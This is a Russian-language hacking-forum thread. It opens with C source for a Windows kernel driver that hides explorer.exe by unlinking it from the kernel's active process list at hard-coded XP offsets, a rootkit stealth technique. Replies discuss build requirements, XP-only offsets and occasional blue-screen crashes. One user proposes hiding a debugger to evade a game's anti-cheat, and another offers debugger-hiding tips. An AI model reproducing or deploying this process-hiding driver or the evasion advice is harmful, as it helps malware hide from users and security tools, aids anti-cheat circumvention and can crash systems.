Скрытие процесса на С++

[zZkamedosZz]

Код:

typedef unsigned long DWORD;
typedef DWORD* PDWORD;

VOID unload(PDRIVER_OBJECT pDriverObject) {
DbgPrint("[-] Oh no :(\n");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) {
PEPROCESS currentProcess;
PEPROCESS nextProcess;
PLIST_ENTRY listProcess;

pDriverObject->DriverUnload = unload;
DbgPrint("[+] The devil is in your kernel!\n");

currentProcess = IoGetCurrentProcess();
nextProcess = currentProcess;

do {
DbgPrint("- %s\n", (PUCHAR)((PUCHAR)nextProcess + 0x174)); // +0x174 ImageFileName : [16] UChar
listProcess = (PLIST_ENTRY)((PUCHAR)nextProcess + 0x88); // +0x088 ActiveProcessLinks : _LIST_ENTRY

if (strcmp((PUCHAR)((PUCHAR)nextProcess + 0x174), "explorer.exe") == 0) {
// +0x000 Flink
// +0x004 Blink
// => Flink + 1 = Blink of the next member
*((PDWORD) listProcess->Flink + 1) = (DWORD) listProcess->Blink;
*((PDWORD) listProcess->Blink) = (DWORD) listProcess->Flink; // Blink = Flink of the previous member

DbgPrint("explorer.exe is now like a ninja");
}

nextProcess = (PEPROCESS) listProcess->Flink;
nextProcess = (PEPROCESS)((PUCHAR)nextProcess - 0x88); // ActiveProcessLinks->Flink jump on "ActiveProcessLinks" in the next process
} while (nextProcess != currentProcess);

return STATUS_SUCCESS;
}

На данном примере показано как скрыть процесс: explorer.exe

[Dimedrol1536]

Цитата: nextProcess + 0x174

Это что?

[zZkamedosZz]

Цитата: Сообщение от Dimedrol1536 Это что?

это сдвиг байтовый

эти значения статичны и менять их не нужно

[крайслер]

-ни слова о том, что это "драйвер"....
-ни слова о том, что нужно DDK...

Цитата: ntddk.h

-ни слова о том, что бы собрать этот код нужно настраивать MVS или использовать консоль WDK....

Цитата: это сдвиг байтовый эти значения статичны и менять их не нужно

Работать будет только на XP )) Для других ОС оффсеты будут другими...




ЗЫ: Иногда вызывает BSOD))

[csx: _or_75]

Цитата: это сдвиг байтовый

сдвиг байтовый вот << 2, а это смещение(оффсет) -_-

[MembRupt]

Цитата: Сообщение от csx: _or_75 сдвиг байтовый вот << 2

Это сдвиг битовый, а не байтовый

Цитата: Сообщение от csx: _or_75 а это смещение(оффсет)

Смещение или величина сдвига - нет разницы

[opower]

То есть можно скрыть любой процесс? Нужно будет попробовать скрыть отладчик и запустить одну известную игрушку, которая не даёт нормально память свою прочесть...

[DaVinchi]

Цитата: Сообщение от opower То есть можно скрыть любой процесс? Нужно будет попробовать скрыть отладчик и запустить одну известную игрушку, которая не даёт нормально память свою прочесть...

А ты уверен, что сможешь приатачиться к процессу? Можно взять модифицированную оллю с определенными плагинами и пробовать ее запускать, некоторые пагины прячут отладчик.
Ну и еще одна ложка дегтя: Некоторые АЧ сканят на наличие сигнатур. А тут всего навсего сокрытие процесса.

[SkaterSPB]

Спасибо бро!
Очень ценно

Цитата: explorer.exe is now like a ninja